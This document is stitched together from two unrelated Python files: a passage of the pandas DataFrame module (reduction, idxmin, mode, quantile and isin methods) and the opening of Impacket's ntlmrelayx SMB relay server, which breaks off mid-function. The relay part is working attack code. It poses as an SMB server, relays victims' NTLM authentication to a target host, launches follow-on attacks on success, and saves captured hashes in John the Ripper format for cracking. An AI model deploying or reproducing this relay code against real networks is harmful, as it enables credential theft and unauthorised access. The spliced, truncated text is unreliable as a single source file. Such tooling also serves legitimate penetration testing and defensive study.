result = self._constructor(counts, index=level_index, columns=agg_axis)
return result
def _reduce(
self,
op,
name: str,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
assert filter_type is None or filter_type == "bool", filter_type
out_dtype = "bool" if filter_type == "bool" else None
dtype_is_dt = np.array(
[
is_datetime64_any_dtype(values.dtype)
for values in self._iter_column_arrays()
],
dtype=bool,
)
if numeric_only is None and name in ["mean", "median"] and dtype_is_dt.any():
warnings.warn(
"DataFrame.mean and DataFrame.median with numeric_only=None "
"will include datetime64 and datetime64tz columns in a "
"future version.",
FutureWarning,
stacklevel=5,
)
cols = self.columns[~dtype_is_dt]
self = self[cols]
any_object = self.dtypes.apply(is_object_dtype).any()
# TODO: Make other agg func handle axis=None properly GH#21597
axis = self._get_axis_number(axis)
labels = self._get_agg_axis(axis)
assert axis in [0, 1]
def func(values):
if is_extension_array_dtype(values.dtype):
return extract_array(values)._reduce(name, skipna=skipna, **kwds)
else:
return op(values, axis=axis, skipna=skipna, **kwds)
def blk_func(values):
if isinstance(values, ExtensionArray):
return values._reduce(name, skipna=skipna, **kwds)
else:
return op(values, axis=1, skipna=skipna, **kwds)
def _get_data() -> DataFrame:
if filter_type is None:
data = self._get_numeric_data()
else:
# GH#25101, GH#24434
assert filter_type == "bool"
data = self._get_bool_data()
return data
if numeric_only is not None or (
numeric_only is None
and axis == 0
and not any_object
and not self._mgr.any_extension_types
):
            # For numeric_only non-None and axis non-None, we know
            # which blocks to use and no try/except is needed.
            # For numeric_only=None, only the case with axis==0 and no object
            # dtypes is unambiguous and can be handled with BlockManager.reduce.
            # For the case with EAs see GH#35881.
df = self
if numeric_only is True:
df = _get_data()
if axis == 1:
df = df.T
axis = 0
ignore_failures = numeric_only is None
# After possibly _get_data and transposing, we are now in the
# simple case where we can use BlockManager.reduce
res, indexer = df._mgr.reduce(blk_func, ignore_failures=ignore_failures)
out = df._constructor(res).iloc[0]
if out_dtype is not None:
out = out.astype(out_dtype)
if axis == 0 and is_object_dtype(out.dtype):
# GH#35865 careful to cast explicitly to object
nvs = coerce_to_dtypes(out.values, df.dtypes.iloc[np.sort(indexer)])
out[:] = np.array(nvs, dtype=object)
return out
assert numeric_only is None
if not self._is_homogeneous_type or self._mgr.any_extension_types:
# try to avoid self.values call
if filter_type is None and axis == 0:
# operate column-wise
# numeric_only must be None here, as other cases caught above
                # this can end up with a non-reduction, but not always:
                # if the types are mixed with datelike then we need to make
                # sure the result comes back as a Series. We only end up here
                # if we have not specified numeric_only and yet we have tried
                # a column-by-column reduction with mixed types.
                # So let's just do what we can.
from pandas.core.apply import frame_apply
opa = frame_apply(
self, func=func, result_type="expand", ignore_failures=True
)
result = opa.get_result()
if result.ndim == self.ndim:
result = result.iloc[0].rename(None)
return result
data = self
values = data.values
try:
result = func(values)
except TypeError:
# e.g. in nanops trying to convert strs to float
data = _get_data()
labels = data._get_agg_axis(axis)
values = data.values
with np.errstate(all="ignore"):
result = func(values)
if filter_type == "bool" and notna(result).all():
result = result.astype(np.bool_)
elif filter_type is None and is_object_dtype(result.dtype):
try:
result = result.astype(np.float64)
except (ValueError, TypeError):
# try to coerce to the original dtypes item by item if we can
if axis == 0:
result = coerce_to_dtypes(result, data.dtypes)
result = self._constructor_sliced(result, index=labels)
return result
def nunique(self, axis=0, dropna=True) -> Series:
"""
Count distinct observations over requested axis.
Return Series with number of distinct observations. Can ignore NaN
values.
Parameters
----------
        axis : {0 or 'index', 1 or 'columns'}, default 0
            The axis to use. 0 or 'index' counts distinct values in each
            column; 1 or 'columns' counts distinct values in each row.
dropna : bool, default True
Don't include NaN in the counts.
Returns
-------
Series
See Also
--------
Series.nunique: Method nunique for Series.
DataFrame.count: Count non-NA cells for each column or row.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 1, 1]})
>>> df.nunique()
A 3
B 1
dtype: int64
>>> df.nunique(axis=1)
0 1
1 2
2 2
dtype: int64
"""
return self.apply(Series.nunique, axis=axis, dropna=dropna)
def idxmin(self, axis=0, skipna=True) -> Series:
"""
Return index of first occurrence of minimum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to use. 0 or 'index' for row-wise, 1 or 'columns' for column-wise.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Returns
-------
Series
Indexes of minima along the specified axis.
Raises
------
ValueError
* If the row/column is empty
See Also
--------
Series.idxmin : Return index of the minimum element.
Notes
-----
This method is the DataFrame version of ``ndarray.argmin``.
Examples
--------
Consider a dataset containing food consumption in Argentina.
>>> df = pd.DataFrame({'consumption': [10.51, 103.11, 55.48],
... 'co2_emissions': [37.2, 19.66, 1712]},
... index=['Pork', 'Wheat Products', 'Beef'])
>>> df
consumption co2_emissions
Pork 10.51 37.20
Wheat Products 103.11 19.66
Beef 55.48 1712.00
By default, it returns the index for the minimum value in each column.
>>> df.idxmin()
consumption Pork
co2_emissions Wheat Products
dtype: object
To return the index for the minimum value in each row, use ``axis="columns"``.
>>> df.idxmin(axis="columns")
Pork consumption
Wheat Products co2_emissions
Beef consumption
dtype: object
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmin(self.values, axis=axis, skipna=skipna)
# indices will always be np.ndarray since axis is not None and
# values is a 2d array for DataFrame
# error: Item "int" of "Union[int, Any]" has no attribute "__iter__"
assert isinstance(indices, np.ndarray) # for mypy
index = self._get_axis(axis)
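        # nanargmin returns -1 for an all-NA column; map that sentinel to NaN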
result = [index[i] if i >= 0 else np.nan for i in indices]
return self._constructor_sliced(result, index=self._get_agg_axis(axis))
def idxmax(self, axis=0, skipna=True) -> Series:
"""
Return index of first occurrence of maximum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to use. 0 or 'index' for row-wise, 1 or 'columns' for column-wise.
skipna : bool, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Returns
-------
Series
Indexes of maxima along the specified axis.
Raises
------
ValueError
* If the row/column is empty
See Also
--------
Series.idxmax : Return index of the maximum element.
Notes
-----
This method is the DataFrame version of ``ndarray.argmax``.
Examples
--------
Consider a dataset containing food consumption in Argentina.
>>> df = pd.DataFrame({'consumption': [10.51, 103.11, 55.48],
... 'co2_emissions': [37.2, 19.66, 1712]},
... index=['Pork', 'Wheat Products', 'Beef'])
>>> df
consumption co2_emissions
Pork 10.51 37.20
Wheat Products 103.11 19.66
Beef 55.48 1712.00
By default, it returns the index for the maximum value in each column.
>>> df.idxmax()
consumption Wheat Products
co2_emissions Beef
dtype: object
To return the index for the maximum value in each row, use ``axis="columns"``.
>>> df.idxmax(axis="columns")
Pork co2_emissions
Wheat Products consumption
Beef co2_emissions
dtype: object
"""
axis = self._get_axis_number(axis)
indices = nanops.nanargmax(self.values, axis=axis, skipna=skipna)
# indices will always be np.ndarray since axis is not None and
# values is a 2d array for DataFrame
# error: Item "int" of "Union[int, Any]" has no attribute "__iter__"
assert isinstance(indices, np.ndarray) # for mypy
index = self._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return self._constructor_sliced(result, index=self._get_agg_axis(axis))
def _get_agg_axis(self, axis_num: int) -> Index:
"""
Let's be explicit about this.
"""
if axis_num == 0:
return self.columns
elif axis_num == 1:
return self.index
else:
raise ValueError(f"Axis must be 0 or 1 (got {repr(axis_num)})")
def mode(self, axis=0, numeric_only=False, dropna=True) -> DataFrame:
"""
Get the mode(s) of each element along the selected axis.
The mode of a set of values is the value that appears most often.
It can be multiple values.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to iterate over while searching for the mode:
* 0 or 'index' : get mode of each column
* 1 or 'columns' : get mode of each row.
numeric_only : bool, default False
If True, only apply to numeric columns.
dropna : bool, default True
Don't consider counts of NaN/NaT.
.. versionadded:: 0.24.0
Returns
-------
DataFrame
The modes of each column or row.
See Also
--------
Series.mode : Return the highest frequency value in a Series.
Series.value_counts : Return the counts of values in a Series.
Examples
--------
>>> df = pd.DataFrame([('bird', 2, 2),
... ('mammal', 4, np.nan),
... ('arthropod', 8, 0),
... ('bird', 2, np.nan)],
... index=('falcon', 'horse', 'spider', 'ostrich'),
... columns=('species', 'legs', 'wings'))
>>> df
species legs wings
falcon bird 2 2.0
horse mammal 4 NaN
spider arthropod 8 0.0
ostrich bird 2 NaN
        By default, missing values are not considered, and the modes of wings
        are both 0 and 2. The second row of species and legs contains ``NaN``,
because they have only one mode, but the DataFrame has two rows.
>>> df.mode()
species legs wings
0 bird 2.0 0.0
1 NaN NaN 2.0
        Setting ``dropna=False``, ``NaN`` values are considered and they can be
the mode (like for wings).
>>> df.mode(dropna=False)
species legs wings
0 bird 2 NaN
Setting ``numeric_only=True``, only the mode of numeric columns is
computed, and columns of other types are ignored.
>>> df.mode(numeric_only=True)
legs wings
0 2.0 0.0
1 NaN 2.0
To compute the mode over columns and not rows, use the axis parameter:
>>> df.mode(axis='columns', numeric_only=True)
0 1
falcon 2.0 NaN
horse 4.0 NaN
spider 0.0 8.0
ostrich 2.0 NaN
"""
data = self if not numeric_only else self._get_numeric_data()
def f(s):
return s.mode(dropna=dropna)
return data.apply(f, axis=axis)
def quantile(self, q=0.5, axis=0, numeric_only=True, interpolation="linear"):
"""
Return values at the given quantile over requested axis.
Parameters
----------
q : float or array-like, default 0.5 (50% quantile)
Value between 0 <= q <= 1, the quantile(s) to compute.
axis : {0, 1, 'index', 'columns'}, default 0
Equals 0 or 'index' for row-wise, 1 or 'columns' for column-wise.
numeric_only : bool, default True
If False, the quantile of datetime and timedelta data will be
computed as well.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
This optional parameter specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`:
* linear: `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* lower: `i`.
* higher: `j`.
* nearest: `i` or `j` whichever is nearest.
* midpoint: (`i` + `j`) / 2.
Returns
-------
Series or DataFrame
If ``q`` is an array, a DataFrame will be returned where the
index is ``q``, the columns are the columns of self, and the
values are the quantiles.
If ``q`` is a float, a Series will be returned where the
index is the columns of self and the values are the quantiles.
See Also
--------
core.window.Rolling.quantile: Rolling quantile.
numpy.percentile: Numpy function to compute the percentile.
Examples
--------
>>> df = pd.DataFrame(np.array([[1, 1], [2, 10], [3, 100], [4, 100]]),
... columns=['a', 'b'])
>>> df.quantile(.1)
a 1.3
b 3.7
Name: 0.1, dtype: float64
>>> df.quantile([.1, .5])
a b
0.1 1.3 3.7
0.5 2.5 55.0
Specifying `numeric_only=False` will also compute the quantile of
datetime and timedelta data.
>>> df = pd.DataFrame({'A': [1, 2],
... 'B': [pd.Timestamp('2010'),
... pd.Timestamp('2011')],
... 'C': [pd.Timedelta('1 days'),
... pd.Timedelta('2 days')]})
>>> df.quantile(0.5, numeric_only=False)
A 1.5
B 2010-07-02 12:00:00
C 1 days 12:00:00
Name: 0.5, dtype: object
"""
validate_percentile(q)
data = self._get_numeric_data() if numeric_only else self
axis = self._get_axis_number(axis)
is_transposed = axis == 1
if is_transposed:
data = data.T
if len(data.columns) == 0:
# GH#23925 _get_numeric_data may have dropped all columns
cols = Index([], name=self.columns.name)
if is_list_like(q):
return self._constructor([], index=q, columns=cols)
return self._constructor_sliced([], index=cols, name=q, dtype=np.float64)
result = data._mgr.quantile(
qs=q, axis=1, interpolation=interpolation, transposed=is_transposed
)
if result.ndim == 2:
result = self._constructor(result)
else:
result = self._constructor_sliced(result, name=q)
if is_transposed:
result = result.T
return result
def to_timestamp(
self, freq=None, how: str = "start", axis: Axis = 0, copy: bool = True
) -> DataFrame:
"""
Cast to DatetimeIndex of timestamps, at *beginning* of period.
Parameters
----------
freq : str, default frequency of PeriodIndex
Desired frequency.
how : {'s', 'e', 'start', 'end'}
Convention for converting period to timestamp; start of period
vs. end.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default).
copy : bool, default True
If False then underlying input data is not copied.
Returns
-------
DataFrame with DatetimeIndex
"""
new_obj = self.copy(deep=copy)
axis_name = self._get_axis_name(axis)
old_ax = getattr(self, axis_name)
new_ax = old_ax.to_timestamp(freq=freq, how=how)
setattr(new_obj, axis_name, new_ax)
return new_obj
def to_period(self, freq=None, axis: Axis = 0, copy: bool = True) -> DataFrame:
"""
Convert DataFrame from DatetimeIndex to PeriodIndex.
Convert DataFrame from DatetimeIndex to PeriodIndex with desired
frequency (inferred from index if not passed).
Parameters
----------
freq : str, default
Frequency of the PeriodIndex.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to convert (the index by default).
copy : bool, default True
If False then underlying input data is not copied.
Returns
-------
DataFrame with PeriodIndex
"""
new_obj = self.copy(deep=copy)
axis_name = self._get_axis_name(axis)
old_ax = getattr(self, axis_name)
new_ax = old_ax.to_period(freq=freq)
setattr(new_obj, axis_name, new_ax)
return new_obj
def isin(self, values) -> DataFrame:
"""
Whether each element in the DataFrame is contained in values.
Parameters
----------
values : iterable, Series, DataFrame or dict
The result will only be true at a location if all the
labels match. If `values` is a Series, that's the index. If
`values` is a dict, the keys must be the column names,
which must match. If `values` is a DataFrame,
then both the index and column labels must match.
Returns
-------
DataFrame
DataFrame of booleans showing whether each element in the DataFrame
is contained in values.
See Also
--------
DataFrame.eq: Equality test for DataFrame.
Series.isin: Equivalent method on Series.
Series.str.contains: Test if pattern or regex is contained within a
string of a Series or Index.
Examples
--------
>>> df = pd.DataFrame({'num_legs': [2, 4], 'num_wings': [2, 0]},
... index=['falcon', 'dog'])
>>> df
num_legs num_wings
falcon 2 2
dog 4 0
When ``values`` is a list check whether every value in the DataFrame
is present in the list (which animals have 0 or 2 legs or wings)
>>> df.isin([0, 2])
num_legs num_wings
falcon True True
dog False True
When ``values`` is a dict, we can pass values to check for each
column separately:
>>> df.isin({'num_wings': [0, 3]})
num_legs num_wings
falcon False False
dog False True
When ``values`` is a Series or DataFrame the index and column must
match. Note that 'falcon' does not match based on the number of legs
in df2.
>>> other = pd.DataFrame({'num_legs': [8, 2], 'num_wings': [0, 2]},
... index=['spider', 'falcon'])
>>> df.isin(other)
num_legs num_wings
falcon True True
dog False False
"""
if isinstance(values, dict):
from pandas.core.reshape.concat import concat
values = collections.defaultdict(list, values)
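            # defaultdict(list): columns missing from `values` compare against
            # an empty list and therefore come back all-False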
return concat(
(
self.iloc[:, [i]].isin(values[col])
for i, col in enumerate(self.columns)
),
axis=1,
)
elif isinstance(values, Series):
if not values.index.is_unique:
raise ValueError("cannot compute isin with a duplicate axis.")
return self.eq(values.reindex_like(self), axis="index")
elif isinstance(values, DataFrame):
if not (values.columns.is_unique and values.index.is_unique):
raise ValueError("cannot compute isin with a duplicate axis.")
return self.eq(values.reindex_like(self))
else:
if not is_list_like(values):
raise TypeError(
"only list-like or dict-like objects are allowed "
"to be passed to DataFrame.isin(), "
f"you passed a '{type(values).__name__}'"
)
return self._constructor(
algorithms.isin(self.values.ravel(), values).reshape(self.shape),
self.index,
self.columns,
)
# ----------------------------------------------------------------------
# Add index and columns
_AXIS_ORDERS = ["index", "columns"]
_AXIS_TO_AXIS_NUMBER: Dict[Axis, int] = {
**NDFrame._AXIS_TO_AXIS_NUMBER,
1: 1,
"columns": 1,
}
_AXIS_REVERSED = True
_AXIS_LEN = len(_AXIS_ORDERS)
_info_axis_number = 1
_info_axis_name = "columns"
index: Index = properties.AxisProperty(
axis=1, doc="The index (row labels) of the DataFrame."
)
columns: Index = properties.AxisProperty(
axis=0, doc="The column labels of the DataFrame."
)
@property
def _AXIS_NUMBERS(self) -> Dict[str, int]:
""".. deprecated:: 1.1.0"""
super()._AXIS_NUMBERS
return {"index": 0, "columns": 1}
@property
def _AXIS_NAMES(self) -> Dict[int, str]:
""".. deprecated:: 1.1.0"""
super()._AXIS_NAMES
return {0: "index", 1: "columns"}
# ----------------------------------------------------------------------
# Add plotting methods to DataFrame
plot = CachedAccessor("plot", pandas.plotting.PlotAccessor)
hist = pandas.plotting.hist_frame
boxplot = pandas.plotting.boxplot_frame
sparse = CachedAccessor("sparse", SparseFrameAccessor)
DataFrame._add_numeric_operations()
ops.add_flex_arithmetic_methods(DataFrame)
ops.add_special_arithmetic_methods(DataFrame)
def _from_nested_dict(data) -> collections.defaultdict:
new_data: collections.defaultdict = collections.defaultdict(dict)
for index, s in data.items():
for col, v in s.items():
new_data[col][index] = v
return new_data
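# Minimal usage sketch, assuming numpy and pandas are installed; it exercises
# a few of the reductions defined above (cov with a minimum-observation
# threshold, column-wise argmin, and membership testing). Illustrative only.
if __name__ == "__main__":
    import numpy as _np
    import pandas as _pd

    _df = _pd.DataFrame({"a": [1.0, 2.0, _np.nan, 4.0], "b": [4.0, 3.0, 2.0, 1.0]})
    print(_df.cov(min_periods=3))   # pairs with < 3 shared observations -> NaN
    print(_df.idxmin())             # index label of each column's minimum
    print(_df.isin([1.0, 2.0]))     # boolean mask of membership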
|
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2020 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# SMB Relay Server
#
# This is the SMB server which relays the connections
# to other protocols
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
from __future__ import division
from __future__ import print_function
from threading import Thread
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import struct
import logging
import time
import calendar
import random
import string
import socket
import ntpath
from binascii import hexlify, unhexlify
from six import b
from impacket import smb, ntlm, LOG, smb3
from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_ACCESS_DENIED, STATUS_SUCCESS, STATUS_NETWORK_SESSION_EXPIRED
from impacket.spnego import SPNEGO_NegTokenResp, SPNEGO_NegTokenInit, TypesMech
from impacket.smbserver import SMBSERVER, outputToJohnFormat, writeJohnOutputToFile
from impacket.spnego import ASN1_AID, MechTypes, ASN1_SUPPORTED_MECH
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
from impacket.smbserver import getFileTime, decodeSMBString, encodeSMBString
class SMBRelayServer(Thread):
def __init__(self,config):
Thread.__init__(self)
self.daemon = True
self.server = 0
#Config object
self.config = config
#Current target IP
self.target = None
#Targets handler
self.targetprocessor = self.config.target
#Username we auth as gets stored here later
self.authUser = None
self.proxyTranslator = None
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
if self.config.smb2support is True:
smbConfig.set("global", "SMB2Support", "True")
else:
smbConfig.set("global", "SMB2Support", "False")
if self.config.outputFile is not None:
smbConfig.set('global','jtr_dump_path',self.config.outputFile)
if self.config.SMBServerChallenge is not None:
smbConfig.set('global', 'challenge', self.config.SMBServerChallenge)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# Change address_family to IPv6 if this is configured
if self.config.ipv6:
SMBSERVER.address_family = socket.AF_INET6
# changed to dereference configuration interfaceIp
if self.config.listeningPort:
smbport = self.config.listeningPort
else:
smbport = 445
self.server = SMBSERVER((config.interfaceIp,smbport), config_parser = smbConfig)
logging.getLogger('impacket.smbserver').setLevel(logging.CRITICAL)
self.server.processConfigFile()
self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate)
self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origSmbNegotiate = self.server.hookSmb2Command(smb3.SMB2_NEGOTIATE, self.SmbNegotiate)
self.origSmbSessionSetup = self.server.hookSmb2Command(smb3.SMB2_SESSION_SETUP, self.SmbSessionSetup)
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb3.SMB2_TREE_CONNECT, self.smb2TreeConnect)
# Let's use the SMBServer Connection dictionary to keep track of our client connections as well
#TODO: See if this is the best way to accomplish this
# changed to dereference configuration interfaceIp
self.server.addConnection('SMBRelay', config.interfaceIp, 445)
### SMBv2 Part #################################################################
def SmbNegotiate(self, connId, smbServer, recvPacket, isSMB1=False):
connData = smbServer.getConnectionData(connId, checkStatus=False)
respPacket = smb3.SMB2Packet()
respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = smb3.SMB2_NEGOTIATE
respPacket['SessionID'] = 0
if isSMB1 is False:
respPacket['MessageID'] = recvPacket['MessageID']
else:
respPacket['MessageID'] = 0
respPacket['TreeID'] = 0
respSMBCommand = smb3.SMB2Negotiate_Response()
# Just for the Nego Packet, then disable it
respSMBCommand['SecurityMode'] = smb3.SMB2_NEGOTIATE_SIGNING_ENABLED
if isSMB1 is True:
# Let's first parse the packet to see if the client supports SMB2
SMBCommand = smb.SMBCommand(recvPacket['Data'][0])
dialects = SMBCommand['Data'].split(b'\x02')
if b'SMB 2.002\x00' in dialects or b'SMB 2.???\x00' in dialects:
respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
#respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21
else:
                # Client does not support SMB2, falling back
                raise Exception('Client does not support SMB2, falling back')
else:
respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002
#respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21
respSMBCommand['ServerGuid'] = b(''.join([random.choice(string.ascii_letters) for _ in range(16)]))
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaxTransactSize'] = 65536
respSMBCommand['MaxReadSize'] = 65536
respSMBCommand['MaxWriteSize'] = 65536
respSMBCommand['SystemTime'] = getFileTime(calendar.timegm(time.gmtime()))
respSMBCommand['ServerStartTime'] = getFileTime(calendar.timegm(time.gmtime()))
respSMBCommand['SecurityBufferOffset'] = 0x80
blob = SPNEGO_NegTokenInit()
blob['MechTypes'] = [TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism'],
TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']]
respSMBCommand['Buffer'] = blob.getData()
respSMBCommand['SecurityBufferLength'] = len(respSMBCommand['Buffer'])
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], STATUS_SUCCESS
def SmbSessionSetup(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
# Are we ready to relay or should we just do local auth?
if 'relayToHost' not in connData:
# Just call the original SessionSetup
respCommands, respPackets, errorCode = self.origSmbSessionSetup(connId, smbServer, recvPacket)
# We remove the Guest flag
if 'SessionFlags' in respCommands[0].fields:
respCommands[0]['SessionFlags'] = 0x00
return respCommands, respPackets, errorCode
# We have confirmed we want to relay to the target host.
respSMBCommand = smb3.SMB2SessionSetup_Response()
sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data'])
connData['Capabilities'] = sessionSetupData['Capabilities']
securityBlob = sessionSetupData['Buffer']
rawNTLM = False
if struct.unpack('B',securityBlob[0:1])[0] == ASN1_AID:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
if len(blob['MechTypes'][0]) > 0:
# Is this GSSAPI NTLM or something else we don't support?
mechType = blob['MechTypes'][0]
if mechType != TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'] and \
mechType != TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism']:
# Nope, do we know it?
if mechType in MechTypes:
mechStr = MechTypes[mechType]
else:
mechStr = hexlify(mechType)
smbServer.log("Unsupported MechType '%s'" % mechStr, logging.CRITICAL)
# We don't know the token, we answer back again saying
# we just support NTLM.
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x03' # request-mic
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken = respToken.getData()
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
respSMBCommand['Buffer'] = respToken
return [respSMBCommand], None, STATUS_MORE_PROCESSING_REQUIRED
elif struct.unpack('B',securityBlob[0:1])[0] == ASN1_SUPPORTED_MECH:
# AUTH packet
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
else:
# No GSSAPI stuff, raw NTLMSSP
rawNTLM = True
token = securityBlob
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
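        # NTLMSSP tokens start with the 8-byte signature b'NTLMSSP\x00',
        # followed by a little-endian uint32 message type:
        # 1 = NEGOTIATE, 2 = CHALLENGE, 3 = AUTHENTICATE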
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
client = connData['SMBClient']
try:
challengeMessage = self.do_ntlm_negotiate(client, token)
except Exception as e:
LOG.debug("Exception:", exc_info=True)
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
# Raise exception again to pass it on to the SMB server
raise
#############################################################
if rawNTLM is False:
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = challengeMessage.getData()
else:
respToken = challengeMessage
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
            # Let's set up a UID for this connection and store it
            # in the connection's data
connData['Uid'] = random.randint(1,0xffffffff)
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x02:
# CHALLENGE_MESSAGE
raise Exception('Challenge Message raise, not implemented!')
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
            # SMBRelay: Ok, so now that we have the Auth token, let's send it
# back to the target system and hope for the best.
client = connData['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
# For some attacks it is important to know the authenticated username, so we store it
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
if rawNTLM is True:
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = securityBlob
securityBlob = respToken2.getData()
if self.config.remove_mic:
clientResponse, errorCode = self.do_ntlm_auth(client, token,
connData['CHALLENGE_MESSAGE']['challenge'])
else:
clientResponse, errorCode = self.do_ntlm_auth(client, securityBlob,
connData['CHALLENGE_MESSAGE']['challenge'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
#Log this target as processed for this client
self.targetprocessor.logTarget(self.target)
LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc, self.authUser))
client.killConnection()
else:
# We have a session, create a thread and do whatever we want
LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc, self.authUser))
# Log this target as processed for this client
self.targetprocessor.logTarget(self.target, True, self.authUser)
ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'], authenticateMessage['lanman'],
authenticateMessage['ntlm'])
client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
connData['Authenticated'] = True
del(connData['relayToHost'])
self.do_attack(client)
# Now continue with the server
#############################################################
if rawNTLM is False:
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegState'] = b'\x00'
else:
respToken = ''
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respSMBCommand['SecurityBufferOffset'] = 0x48
respSMBCommand['SecurityBufferLength'] = len(respToken)
if respSMBCommand['SecurityBufferLength'] > 0:
respSMBCommand['Buffer'] = respToken.getData()
else:
respSMBCommand['Buffer'] = ''
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
authenticateMessage = connData['AUTHENTICATE_MESSAGE']
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode ('utf-16le'),
authenticateMessage['user_name'].decode ('utf-16le'))).upper ()
        # Uncommenting this will stop at the first relayed connection and won't relay again until all targets
        # are processed. There might be a use case for this
#if 'relayToHost' in connData:
# # Connection already relayed, let's just answer the request (that will return object not found)
# return self.origsmb2TreeConnect(connId, smbServer, recvPacket)
try:
if self.config.mode.upper () == 'REFLECTION':
